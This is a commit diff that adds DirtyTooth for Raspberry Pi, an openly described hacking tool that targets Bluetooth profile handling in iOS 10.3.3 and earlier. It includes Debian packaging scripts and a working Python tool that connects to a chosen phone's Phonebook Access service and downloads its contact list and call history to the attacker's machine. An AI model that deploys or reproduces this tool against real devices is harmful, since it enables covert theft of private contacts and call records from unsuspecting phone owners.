Merge pull request #1 from toolsprods/master

First release

Author: jaesga

README.md

@@ -1 +1,33 @@
-# DirtyTooth-RaspberryPi
+![Version](https://img.shields.io/badge/Raspberry_Pi-DirtyTooth-red.svg?style=flat-square)
+![License](https://img.shields.io/badge/license-AGPL-green.svg?style=flat-square)
+
+# DirtyTooth for Raspberry Pi
+
+Bluetooth communications are on the increase. Millions of users use the technology to connect to peripherals that simplify and provide greater comfort and experience.
+There is a trick or hack for iOS 10.3.3 and earlier that takes advantage of the management of the profiles causing impact on the privacy of users who use Bluetooth technology daily.
+From the iOS device information leak caused by the incorrect management of profiles, a lot of information about the user and their background may be obtained.
+
+Compile
+=======
+In order to compile the packet, execute the command on the dirtytooth folder:
+```
+sudo dpkg-deb -b dirtytooth/ dirtytooth.deb
+```
+If you do not want to compile the packet, just download the release and install it.
+
+Install
+=======
+Simply download the release and run the *install.sh* script:
+```
+sudo ./install.sh
+```
+If you want to install it manually, you need to prepare the dependences and install the *dirtytooth.deb* packet:
+```
+sudo apt-get update
+sudo apt-get install pi-bluetooth libbluetooth-dev python-dev python-dbus python-pip python-gobject python-gobject-2 git pulseaudio pulseaudio-module-bluetooth
+sudo dpkg -i dirtytooth.deb
+```
+
+License
+=======
+This project is licensed under the AGPL Affero General Public License - see the LICENSE file for details

dirtytooth/DEBIAN/control

@@ -0,0 +1,9 @@
+Package: dirtytooth
+Version: 1.0
+Section: base
+Priority: optional
+Architecture: armhf
+Depends: pi-bluetooth, libbluetooth-dev, python-dev, python-dbus, python-pip, python-gobject, python-gobject-2, git, pulseaudio, pulseaudio-module-bluetooth
+Maintainer: Eleven Paths <labs@elevenpaths.com>
+Description: Dirtytooth package
+ DirtyTooth is a small hack that takes advantage of the iOS configuration as far as bluetooth profile management is concerned, through this little hack you can extract information from users an their environment.

dirtytooth/DEBIAN/postinst

@@ -0,0 +1,42 @@
+#!/bin/bash
+# Postinstallation dirtytooth package
+
+nobexurl="https://github.com/nccgroup/nOBEX.git"
+nobexcommit="0583c72"
+
+# Detect if PyBluez is installed
+pybluez=$(pip list | grep PyBluez)
+if [ "$pybluez" == "" ] ; then
+    sudo pip install pybluez==0.22
+fi
+
+# Detect if nOBEX is installed
+nobex=$(pip list | grep nOBEX)
+if [ "$nobex" == "" ] ; then
+    cd /tmp
+    git clone $nobexurl
+    cd nOBEX
+    git reset --hard $nobexcommit
+    python setup.py install
+    cd /tmp
+    rm -rf nOBEX
+fi
+
+# Detect if psutil is installed
+psutil=$(pip list | grep psutil)
+if [ "$psutil" == "" ] ; then
+    sudo pip install psutil==5.2.2
+fi
+
+my_sudo_user=$SUDO_USER
+sudo usermod -a -G lp $my_sudo_user
+
+sed -i '/.*resample-method =.*/c\resample-method = trivial' /etc/pulse/daemon.conf
+
+# Add audio hook
+audiohook=$(cat /etc/udev/rules.d/99-com.rules | grep /usr/lib/udev/bluetooth)
+if [ "$audiohook" == "" ] ; then
+    sudo sed -i '/SUBSYSTEM=="input".*/a KERNEL=="input\[0-9\]*", RUN+="/usr/lib/udev/bluetooth"' /etc/udev/rules.d/99-com.rules
+fi
+
+echo "Dirtytooth installation finished"

dirtytooth/DEBIAN/postrm

@@ -0,0 +1,10 @@
+#!/bin/bash
+# Post remove script for dirtytooth package
+
+# Delete audio hook
+audiohook=$(cat /etc/udev/rules.d/99-com.rules | grep /usr/lib/udev/bluetooth)
+if [ "$audiohook" != "" ] ; then
+    sudo sed -i '/.*\/usr\/lib\/udev\/bluetooth"/d' /etc/udev/rules.d/99-com.rules
+fi
+
+echo "Dirtytooth package removed"

dirtytooth/DEBIAN/preinst

@@ -0,0 +1,9 @@
+#!/bin/bash
+# Preinstallation dirtytooth package
+
+if ping -q -c 1 -W 1 8.8.8.8 >/dev/null; then
+  echo "Welcome to Dirtytooth installer"
+else
+  echo "Dirtytooth installer needs Internet to install the necessary dependencies."
+  exit 1
+fi

dirtytooth/DEBIAN/prerm

@@ -0,0 +1,5 @@
+#!/bin/bash
+# Pre remove script for dirtytooth package
+
+my_sudo_user=$SUDO_USER
+sudo gpasswd -d $my_sudo_user lp

dirtytooth/etc/bluetooth/audio.conf

@@ -0,0 +1,2 @@
+[General]:
+Enable=Source,Sink,Media,Socket

dirtytooth/usr/bin/dirtytooth

@@ -0,0 +1,121 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import os
+import sys
+import time
+import psutil
+import logging
+import argparse
+import datetime
+import bluetooth
+import subprocess
+from nOBEX import client, headers, responses
+
+START_PATH = '/usr/lib/dirtytooth/start'
+FILES_PATH = '/root/dirtytooth/'
+LOG_PATH = '/var/log/bluetooth_dev'
+
+parser = argparse.ArgumentParser(description='Dirtytooth package',
+                                 epilog="Enjoy with dirtytooth!")
+group = parser.add_mutually_exclusive_group(required=True)
+group.add_argument('--start', action='store_true', help='Start agent discover')
+group.add_argument('--stop', action='store_true', help='Stop agent discover')
+group.add_argument('--mac', help='MAC device to get dirtytooth! }:)')
+args = parser.parse_args()
+
+
+def get_pid():
+    for proc_name in psutil.pids():
+        if psutil.Process(proc_name).name() == 'dirtyagent':
+            return psutil.Process(proc_name).pid
+    return None
+
+
+def write_file(filename, file):
+    with open(FILES_PATH + filename, "w") as f:
+        f.write(file)
+
+
+def get_name(addr):
+    return subprocess.check_output(["/usr/lib/dirtytooth/device",
+                                    "name", addr], shell=False)
+
+
+def connect(device_address):
+    d = bluetooth.find_service(address=device_address, uuid="1130")
+    if not d:
+        logging.error('No Phonebook service found.')
+        sys.exit(1)
+
+    port = d[0]["port"]
+
+    # Use the generic Client class to connect to the phone.
+    c = client.Client(device_address, port)
+    uuid = b'\x79\x61\x35\xf0\xf0\xc5\x11\xd8\x09\x66\x08\x00\x20\x0c\x9a\x66'
+    result = c.connect(header_list=[headers.Target(uuid)])
+
+    if not isinstance(result, responses.ConnectSuccess):
+        logging.error('Failed to connect to phone.')
+        sys.exit(1)
+
+    return c
+
+
+def get_file(c, src_path, filename, book=True):
+    if book:
+        mimetype = b'x-bt/phonebook'
+    else:
+        mimetype = b'x-bt/vcard'
+
+    hdrs, file = c.get(src_path, header_list=[headers.Type(mimetype)])
+    write_file(filename, file)
+    logging.info('%s save!' % filename)
+
+
+def main():
+    logging.basicConfig(format='%(levelname)s:%(message)s',
+                        filename=LOG_PATH,
+                        level=logging.DEBUG)
+
+    if args.start:
+        if get_pid():
+            print('Process dirtyagent is already open!')
+        else:
+            subprocess.call([START_PATH], shell=True)
+    elif args.stop:
+        pid = get_pid()
+        if pid:
+            p = psutil.Process(pid)
+            p.terminate()
+        else:
+            print('Process dirtyagent doesn´t exist')
+    else:
+        if get_pid():
+            print('Dirtytooth: Getting device info: %s' % args.mac)
+
+            device_address = args.mac
+
+            c = connect(device_address)
+
+            if not os.path.isdir(FILES_PATH):
+                os.mkdir(FILES_PATH)
+
+            date = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d%H%M%S')
+
+            get_file(c, "telecom/pb.vcf",
+                     "%s-UTC_%s_phonebook" % (date, device_address))
+            get_file(c, "telecom/cch.vcf",
+                     "%s-UTC_%s_history" % (date, device_address))
+
+            c.disconnect()
+            return 0
+        else:
+            print('Process dirtyagent doesn´t exist')
+
+
+if __name__ == "__main__":
+    if os.geteuid() != 0:
+        print "Dirtytooth must be executed as root."
+        sys.exit(1)
+    sys.exit(main())

dirtytooth/usr/lib/dirtytooth/bluezutils.py

@@ -0,0 +1,47 @@
+import dbus
+
+SERVICE_NAME = "org.bluez"
+ADAPTER_INTERFACE = SERVICE_NAME + ".Adapter1"
+DEVICE_INTERFACE = SERVICE_NAME + ".Device1"
+
+def get_managed_objects():
+	bus = dbus.SystemBus()
+	manager = dbus.Interface(bus.get_object("org.bluez", "/"),
+				"org.freedesktop.DBus.ObjectManager")
+	return manager.GetManagedObjects()
+
+def find_adapter(pattern=None):
+	return find_adapter_in_objects(get_managed_objects(), pattern)
+
+def find_adapter_in_objects(objects, pattern=None):
+	bus = dbus.SystemBus()
+	for path, ifaces in objects.iteritems():
+		adapter = ifaces.get(ADAPTER_INTERFACE)
+		if adapter is None:
+			continue
+		if not pattern or pattern == adapter["Address"] or \
+							path.endswith(pattern):
+			obj = bus.get_object(SERVICE_NAME, path)
+			return dbus.Interface(obj, ADAPTER_INTERFACE)
+	raise Exception("Bluetooth adapter not found")
+
+def find_device(device_address, adapter_pattern=None):
+	return find_device_in_objects(get_managed_objects(), device_address,
+								adapter_pattern)
+
+def find_device_in_objects(objects, device_address, adapter_pattern=None):
+	bus = dbus.SystemBus()
+	path_prefix = ""
+	if adapter_pattern:
+		adapter = find_adapter_in_objects(objects, adapter_pattern)
+		path_prefix = adapter.object_path
+	for path, ifaces in objects.iteritems():
+		device = ifaces.get(DEVICE_INTERFACE)
+		if device is None:
+			continue
+		if (device["Address"] == device_address and
+						path.startswith(path_prefix)):
+			obj = bus.get_object(SERVICE_NAME, path)
+			return dbus.Interface(obj, DEVICE_INTERFACE)
+
+	raise Exception("Bluetooth device not found")